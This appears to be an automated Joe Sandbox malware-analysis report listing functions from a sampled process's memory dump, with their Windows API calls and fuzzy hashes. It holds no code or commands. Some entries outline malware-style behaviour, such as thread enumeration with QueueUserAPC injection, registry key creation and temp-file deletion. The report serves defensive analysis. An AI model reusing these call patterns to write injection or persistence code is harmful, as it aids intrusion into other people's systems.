Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 4138089493-0
Opcode ID: 783073b17aed741890e9e873bbcac79915b484465d666ac3ea1823449a0b5eb4
Instruction ID: 8a17ab145dd49000902bbb7885f4ca63ba75cf590f3b81554ab55c4b229f505a
Opcode Fuzzy Hash: 783073b17aed741890e9e873bbcac79915b484465d666ac3ea1823449a0b5eb4
Instruction Fuzzy Hash: C1315732902608FFDB61EFA4DC48DAFBBBDFB49301B184561F505E2028D7769A41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 03048ABB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

memset.NTDLL ref: 03048AE9
StrTrimA.SHLWAPI(?,0305847C), ref: 03048B78
StrTrimA.SHLWAPI(00000001,0305847C), ref: 03048B97
_strupr.NTDLL ref: 03048B9E
StrTrimA.SHLWAPI(?,?), ref: 03048BAB
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 03048BF3
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?,00000001), ref: 03048C12

Strings

;, xrefs: 03048B51

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: ;
API String ID: 4019332941-1661535913
Opcode ID: fec6750edce218abc15c47a6e223593a5eb8ba59800e7bf87919a396f27e531e
Instruction ID: 6dfdf56687f21ec8deebd85e2d79091b0c603a7fb570bb6e8b4782f6d5c61e83
Opcode Fuzzy Hash: fec6750edce218abc15c47a6e223593a5eb8ba59800e7bf87919a396f27e531e
Instruction Fuzzy Hash: FF41F3B15063099FD750EF288844B5BFBE8AF85640F088829F995CB241EB75E605CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0303A873, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(030346D1,00000000,?,00000000,?,?,030346D1,00000035,00000000,?,00000000), ref: 0303A8A3
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0303A8B9
memcpy.NTDLL(00000010,030346D1,00000000,?,?,030346D1,00000035,00000000), ref: 0303A8EF
memcpy.NTDLL(00000010,00000000,00000035,?,?,030346D1,00000035), ref: 0303A90A
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0303A928
GetLastError.KERNEL32(?,?,030346D1,00000035), ref: 0303A932
HeapFree.KERNEL32(00000000,00000000,?,?,030346D1,00000035), ref: 0303A955

Strings

(, xrefs: 0303A93C

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 814a1376658dfc4a19c1cf3b916f934e359b5116d2bf9dba564241103695a8fc
Instruction ID: 0dedf141dee15984e866c9bc1071a7d3aec972adde5ed08604ffa6de36faa069
Opcode Fuzzy Hash: 814a1376658dfc4a19c1cf3b916f934e359b5116d2bf9dba564241103695a8fc
Instruction Fuzzy Hash: 4931B136A0230AEFDB20EFA5D844AABBBBCEB45310F04443AFD45E2250D335DA54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303D07D, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03041C6B: RtlEnterCriticalSection.NTDLL(0305C328), ref: 03041C73
Part of subcall function 03041C6B: RtlLeaveCriticalSection.NTDLL(0305C328), ref: 03041C88
Part of subcall function 03041C6B: InterlockedIncrement.KERNEL32(0000001C), ref: 03041CA1

RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0303D0BA
memset.NTDLL ref: 0303D0CB
lstrcmpi.KERNEL32(?,?), ref: 0303D10B
RtlAllocateHeap.NTDLL(00000000,?), ref: 0303D137
memcpy.NTDLL(00000000,?,?), ref: 0303D14B
memset.NTDLL ref: 0303D158
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0303D171
memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0303D194
HeapFree.KERNEL32(00000000,?), ref: 0303D1B1

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 694413484-0
Opcode ID: 83b7a09433f216b325d276ea765a68affa8af83028e7761dfeda8968fca004ca
Instruction ID: 862de414de4c2e22ded1fa5bed8010ae240d9d185e1a5e3a5164dcd54dc73412
Opcode Fuzzy Hash: 83b7a09433f216b325d276ea765a68affa8af83028e7761dfeda8968fca004ca
Instruction Fuzzy Hash: DE41CE72A02309FFDB50EFA9CC84BEEBBB9EB05314F184429E805A7250D735AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 030501FA, Relevance: 13.6, APIs: 9, Instructions: 119memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 0305026D
RtlAllocateHeap.NTDLL(00000000,0305BC8A), ref: 03050283
memcpy.NTDLL(00000000,00000000,0305BC88), ref: 03050296
_wcsupr.NTDLL ref: 030502A1
lstrlenW.KERNEL32(?,0305BC88), ref: 030502DA
RtlAllocateHeap.NTDLL(00000000,?,0305BC88), ref: 030502EF
lstrcpyW.KERNEL32(00000000,?), ref: 03050305
lstrcatW.KERNEL32(00000000,?), ref: 0305032A
HeapFree.KERNEL32(00000000,00000000), ref: 03050339

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Allocatelstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID:
API String ID: 632491215-0
Opcode ID: 597d112d15f0937695f65d5636979cf91b310e892364a89be8d4f1da7dfc5e1b
Instruction ID: dd2d3458ea6d2cf2aab33bdbfc260e51021f74dfcb70b02d6890c396a80c5f3b
Opcode Fuzzy Hash: 597d112d15f0937695f65d5636979cf91b310e892364a89be8d4f1da7dfc5e1b
Instruction Fuzzy Hash: E431E532502319AFC760EF64DC8897FB7ECEB85320F594529FD11D6185DB79A840CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0304E26F, Relevance: 13.6, APIs: 9, Instructions: 94memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 0304E280
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0304E2A7
GetTickCount.KERNEL32 ref: 0304E2BE
wsprintfA.USER32 ref: 0304E2D5
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0304E310
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 0304E32D
lstrlen.KERNEL32(00000000), ref: 0304E337
RegCloseKey.ADVAPI32(?), ref: 0304E353
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 0304E361

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID:
API String ID: 3389039979-0
Opcode ID: d899b1947c3ac7237e0c540dfa958b1842bcb14338ecd606fba521c30a81ff9d
Instruction ID: 3e73596b614f6df988eee7d0f931e08c73fa84904220e9b8e2d26b0432598ab3
Opcode Fuzzy Hash: d899b1947c3ac7237e0c540dfa958b1842bcb14338ecd606fba521c30a81ff9d
Instruction Fuzzy Hash: 6B3168B2102209FFEB11AFA5DC88DAF7BACFF45295B045026F905C2104DB799A41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03038F78, Relevance: 13.6, APIs: 9, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03053269: memset.NTDLL ref: 0305328B
Part of subcall function 03053269: CloseHandle.KERNEL32(?,?,?,?,?), ref: 03053335

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 03038FBF
CloseHandle.KERNEL32(?), ref: 03038FCB
lstrlenW.KERNEL32(00000000), ref: 03038FE5
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03038FF6
wcstombs.NTDLL ref: 03039007
lstrlen.KERNEL32(?), ref: 03039014
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 0303904A
HeapFree.KERNEL32(00000000,00000000), ref: 0303905C
DeleteFileW.KERNEL32(?), ref: 0303906A

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFreeUnmapmemsetwcstombs
String ID:
API String ID: 947131853-0
Opcode ID: 10c1662fa3419e4312307421fe7d5f83286a47132b73bf264780472a2f7d7ee9
Instruction ID: a7a2dda5e100dadc43c31e7804eaa770007e70d02864ba0f5ea44676657abd25
Opcode Fuzzy Hash: 10c1662fa3419e4312307421fe7d5f83286a47132b73bf264780472a2f7d7ee9
Instruction Fuzzy Hash: B8315C7690220DFFCF21EFA4D8889EFBBB9FF45351B444065F501A2110DB769951DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0304E721, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,060BA534,?,?,060BA534,?,?,060BA534,?,?,060BA534,?,00000000,00000000,00000000), ref: 0304E81F
lstrcpyW.KERNEL32(00000000,?), ref: 0304E842
lstrcatW.KERNEL32(00000000,00000000), ref: 0304E84A
lstrlenW.KERNEL32(00000000,?,060BA534,?,?,060BA534,?,?,060BA534,?,?,060BA534,?,?,060BA534,?), ref: 0304E895
memcpy.NTDLL(00000000,?,?,?), ref: 0304E8FD
LocalFree.KERNEL32(?,?), ref: 0304E914

Strings

P, xrefs: 0304E79A

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P
API String ID: 3649579052-3110715001
Opcode ID: ea3e022a5a24a87e4fe5686f2f6fb02fade1377c537579e977b4184e8cc5b473
Instruction ID: faa56fc0329e225f6ff5316bee8ecbcf2bc4e63deed8cab567c67cafb722ec62
Opcode Fuzzy Hash: ea3e022a5a24a87e4fe5686f2f6fb02fade1377c537579e977b4184e8cc5b473
Instruction Fuzzy Hash: E46139B590230AAFDF50EFA8CC88DEFBBB9FF45204B184535E544A7251DB359A06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303C83F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 0303C869
GetCurrentThreadId.KERNEL32 ref: 0303C87F
GetCurrentThread.KERNEL32 ref: 0303C890

Part of subcall function 0303FC76: GetCurrentThreadId.KERNEL32 ref: 0303FCAE
Part of subcall function 0303FC76: GetSystemTimeAsFileTime.KERNEL32(0304B2AE,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?,0000000E), ref: 0303FCBA
Part of subcall function 0303FC76: GetTempFileNameA.KERNEL32(00000000,00000000,0304B2AE,00000000,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?), ref: 0303FCC8
Part of subcall function 0303FC76: lstrcpy.KERNEL32(00000000), ref: 0303FCEA

Part of subcall function 0303EA80: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,03056048,00000000,?,0303C8DA,?,?,?,00000000), ref: 0303EAEB
Part of subcall function 0303EA80: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,03056048,00000000,?,0303C8DA,?,?,?,00000000), ref: 0303EB13

RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0303C965
wsprintfA.USER32 ref: 0303C97D
lstrlen.KERNEL32(00000000,00000000), ref: 0303C988

Strings

W, xrefs: 0303C952

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CurrentThread$FileHeapTimelstrlen$AllocateFreeHeaderImageNameSystemTemplstrcpywsprintf
String ID: W
API String ID: 896920683-655174618
Opcode ID: bc5b89e48366c30a43ecc93ef2953923bc202c59ab4e5f0defc3ccf658f33c9e
Instruction ID: 6d03132a65182ae9cde20b478ed86e4a52f93aa302f78b6639bf3cffc7f48c1a
Opcode Fuzzy Hash: bc5b89e48366c30a43ecc93ef2953923bc202c59ab4e5f0defc3ccf658f33c9e
Instruction Fuzzy Hash: 0F416935902319FBEB11EFA5DC489AFBFBCEF4A740B054026E505E6210D7349691DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03034B3C, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 03034B48
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03034B66
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03034B6E
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 03034B8C
GetLastError.KERNEL32 ref: 03034BA0
RegCloseKey.ADVAPI32(?), ref: 03034BAB
CloseHandle.KERNEL32(00000000), ref: 03034BB2
GetLastError.KERNEL32 ref: 03034BBA

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: a41a71c956a6539de79d75c075b56e2621eac86ebca860423fa610d9c1c919da
Instruction ID: 0aa5bd8e64509fbd5e3652756bd9ab2432b5ac4ec264ba32e26aa872da343cc9
Opcode Fuzzy Hash: a41a71c956a6539de79d75c075b56e2621eac86ebca860423fa610d9c1c919da
Instruction Fuzzy Hash: 86116136202209FFEB01AF65DC48F6B3BADEB85351F544021FE06CA254CB76D900CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0304709C, Relevance: 10.7, APIs: 7, Instructions: 168memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 030470DD
memset.NTDLL ref: 030470F1

Part of subcall function 0303B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B89A
Part of subcall function 0303B84E: RegCloseKey.KERNELBASE(00000000,?,0304ED32,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0303B8DE

GetCurrentThreadId.KERNEL32 ref: 0304717E
GetCurrentThread.KERNEL32 ref: 03047191
RtlEnterCriticalSection.NTDLL(0305C25C), ref: 03047238
Sleep.KERNEL32(0000000A), ref: 03047242
RtlLeaveCriticalSection.NTDLL(0305C25C), ref: 03047268

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: AllocateCriticalCurrentHeapSectionThread$CloseEnterLeaveSleepmemset
String ID:
API String ID: 1717395723-0
Opcode ID: 7b9ab6c15a74c5fbbf7f65365a1dd82ccdaa54c1d97a5c18210fd155e2bd2b17
Instruction ID: c6297dd9751b87844c3cf097e807969b1c6af55b3aee3e7c1519a3bf27985a56
Opcode Fuzzy Hash: 7b9ab6c15a74c5fbbf7f65365a1dd82ccdaa54c1d97a5c18210fd155e2bd2b17
Instruction Fuzzy Hash: 9C5168B5506301EFEB50EF68D98086BBBE8FB89744F44092EF598D7220D735DA488B52

Uniqueness

Uniqueness Score: -1.00%

Function 03043820, Relevance: 10.6, APIs: 7, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,?), ref: 03043893
HeapFree.KERNEL32(00000000,00000001), ref: 030438D4
HeapFree.KERNEL32(00000000,?), ref: 030438E4
HeapFree.KERNEL32(00000000,?,?,0303ADF7,?,00000001,?,?), ref: 03043950
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0303ADF7,?,00000001), ref: 03043974
HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,0303ADF7,?,00000001), ref: 03043999
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0303ADF7,?,00000001), ref: 030439AE

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FreeHeap$CloseCreate
String ID:
API String ID: 1871255303-0
Opcode ID: 50a06d7e2d65de98dffda01cec29890255e0ec3154785f96857e3c7f879b9692
Instruction ID: 5bcd7e5e7e893de321c80031cd9f1e5ba006f6ea8058758e93197d68b35e0c35
Opcode Fuzzy Hash: 50a06d7e2d65de98dffda01cec29890255e0ec3154785f96857e3c7f879b9692
Instruction Fuzzy Hash: C251D2B5C0220EEFDF01EFD5D8808EEBBB9FB08344B1450AAE514A2250D3359EA0DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0304221B, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 03042246
StrTrimA.SHLWAPI(00000000,?), ref: 03042263
HeapFree.KERNEL32(00000000,00000000), ref: 03042296
RtlImageNtHeader.NTDLL(00000000), ref: 030422C1
HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 03042383

Part of subcall function 03048502: lstrlen.KERNEL32(?,0305BCB8,00000000,00000000,0304F5D7,00000000,00000001,00000000,0305603C,?,?,0304BD43,00000000,00000000), ref: 0304850B
Part of subcall function 03048502: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 0304852E
Part of subcall function 03048502: memset.NTDLL ref: 0304853D

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 03042334
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 03042363

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID:
API String ID: 239510280-0
Opcode ID: 7ff42ef47b18be5a00cdbadaed826ee7b9e88b24caf3d78dec3ef57fd93ce8fe
Instruction ID: 2a5409e26d461e8f2ce8a7397a9ed6ee367e9ec168fb8150ccadd971079afc75
Opcode Fuzzy Hash: 7ff42ef47b18be5a00cdbadaed826ee7b9e88b24caf3d78dec3ef57fd93ce8fe
Instruction Fuzzy Hash: 6B41E1B1702309FFEB21EA64DC44BAF7AFDEB85741F144470F605AA180EB759B408B44

Uniqueness

Uniqueness Score: -1.00%

Function 0304C9DE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0304CA39
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0304CA64
memcpy.NTDLL(00000000,?,?), ref: 0304CA83
HeapFree.KERNEL32(00000000,00000000), ref: 0304CAE4
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0304CB06

Strings

W, xrefs: 0304CB32

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Allocatememcpy$Free
String ID: W
API String ID: 1024222012-655174618
Opcode ID: 32115362203efc64637e56465316bc969b99626a9424f1eb48e4406f62d6b55a
Instruction ID: 9703e450b279b3f8d8b23ec45b7ccfdacf776b4abdcdd883675700b257c1505c
Opcode Fuzzy Hash: 32115362203efc64637e56465316bc969b99626a9424f1eb48e4406f62d6b55a
Instruction Fuzzy Hash: 14413DB190230AFFDF11DF95DC84AAFBBB9FF48244F144469E904A7211E7319A549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 030503B7, Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 030503E0
RtlEnterCriticalSection.NTDLL(0305C008), ref: 03050423
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0305043E
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03050494
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 030504EF
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 030504FD
RtlLeaveCriticalSection.NTDLL(0305C008), ref: 03050508

Part of subcall function 030401CC: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 030401E0
Part of subcall function 030401CC: memcpy.NTDLL(00000000,0304EC23,?,?,-00000005,?,0304EC23,00000001,00000000,-00000005,00000001), ref: 03040209
Part of subcall function 030401CC: RegCloseKey.ADVAPI32(?,?,0304EC23,00000001,00000000,-00000005,00000001), ref: 0304025D

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
String ID:
API String ID: 2070110485-0
Opcode ID: ef4c0184da66849c9f04431b146a674c7866703b2cb8f103b79b79b87d9936ad
Instruction ID: a56d029596ac8304a7b779453107f6ba16b8ed1fedc294fe4fc7f82ec6d7b58e
Opcode Fuzzy Hash: ef4c0184da66849c9f04431b146a674c7866703b2cb8f103b79b79b87d9936ad
Instruction Fuzzy Hash: D74177B2202305ABEB61EF65DC88FAF7BA8EB44742F184424FD06DA154DB79DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030439D7, Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0305C00C), ref: 030439E9
lstrcpy.KERNEL32(00000000), ref: 03043A25

Part of subcall function 0304182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,030436F0,?,00000000,-00000007,0304A023,-00000007,0303AAC3,00000000), ref: 0304183A

GetLastError.KERNEL32(00000000), ref: 03043AB4
HeapFree.KERNEL32(00000000,?), ref: 03043ACB
InterlockedDecrement.KERNEL32(0305C00C), ref: 03043AE2
DeleteFileA.KERNEL32(00000000), ref: 03043B03
HeapFree.KERNEL32(00000000,00000000), ref: 03043B13

Part of subcall function 0303FC76: GetCurrentThreadId.KERNEL32 ref: 0303FCAE
Part of subcall function 0303FC76: GetSystemTimeAsFileTime.KERNEL32(0304B2AE,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?,0000000E), ref: 0303FCBA
Part of subcall function 0303FC76: GetTempFileNameA.KERNEL32(00000000,00000000,0304B2AE,00000000,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?), ref: 0303FCC8
Part of subcall function 0303FC76: lstrcpy.KERNEL32(00000000), ref: 0303FCEA

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$FreeHeapInterlockedTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemTempThreadlstrlen
String ID:
API String ID: 802748518-0
Opcode ID: c7dccaac92be5ffeb45152247408bcbe0aec5ad3f254644bc392b2cfb8ad2ce1
Instruction ID: 491f7bda3824790d66574b0dc93fda2697f1ddb2a9f82d6ec55b13b2dc28c272
Opcode Fuzzy Hash: c7dccaac92be5ffeb45152247408bcbe0aec5ad3f254644bc392b2cfb8ad2ce1
Instruction Fuzzy Hash: EC31F5BA942318FBCB11EFA4C844AAFBAB8EB44751F1460B5F9059B140D7798B60CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030311F1, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303FC76: GetCurrentThreadId.KERNEL32 ref: 0303FCAE
Part of subcall function 0303FC76: GetSystemTimeAsFileTime.KERNEL32(0304B2AE,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?,0000000E), ref: 0303FCBA
Part of subcall function 0303FC76: GetTempFileNameA.KERNEL32(00000000,00000000,0304B2AE,00000000,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?), ref: 0303FCC8
Part of subcall function 0303FC76: lstrcpy.KERNEL32(00000000), ref: 0303FCEA

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,0304C83A,?), ref: 03031232
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,0304C83A,?,00000000,00000000,00000000,00000000,00000000), ref: 030312A5

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$Time$CreateCurrentFreeHeapNameSystemTempThreadlstrcpy
String ID:
API String ID: 1158284192-0
Opcode ID: 955652f8f4d0bf87130b3c36cbb0c0975706b76bdcb415cd8fcc15185ad8ad9f
Instruction ID: ca3d07e73e5adc9bb5a956c788760dfda1ff721325366862488c296ce526c196
Opcode Fuzzy Hash: 955652f8f4d0bf87130b3c36cbb0c0975706b76bdcb415cd8fcc15185ad8ad9f
Instruction Fuzzy Hash: 2111C132147319BBD731BA61EC48F7F3F6CEB4A7A1F001520F601D5191DB6A58A48BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0304E380, Relevance: 10.6, APIs: 7, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0304E3B2
GetModuleHandleA.KERNEL32(?,060BA2C6,00000004,00000000,?,00000000,00000000), ref: 0304E3D2
GetProcAddress.KERNEL32(00000000), ref: 0304E3D9
Thread32First.KERNEL32(00000000,0000001C), ref: 0304E3E9
OpenThread.KERNEL32(001F03FF,00000000,00000000,00000001,0000001C), ref: 0304E404
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0304E415
Thread32Next.KERNEL32(00000001,0000001C), ref: 0304E425

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Thread32$AddressCreateFirstHandleModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 190292596-0
Opcode ID: 2a30d959be468b43eeca2f4394f89dde9d6e7392197305f521cd00d6d28d2728
Instruction ID: d604a9b2cbfdf20e32f28321d81b304f1114c1831cd942584ed1118031851ee9
Opcode Fuzzy Hash: 2a30d959be468b43eeca2f4394f89dde9d6e7392197305f521cd00d6d28d2728
Instruction Fuzzy Hash: C2213BB290120CAFDF01EFA4DC88DEFBBB9FB49255B044136FA01A6150DB359A41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0304E027, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0304E058
wcstombs.NTDLL ref: 0304E069
OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0304E08A
TerminateProcess.KERNEL32(00000000,00000000), ref: 0304E099
CloseHandle.KERNEL32(00000000), ref: 0304E0A0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0304E0AF
WaitForSingleObject.KERNEL32(00000000), ref: 0304E0BF

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

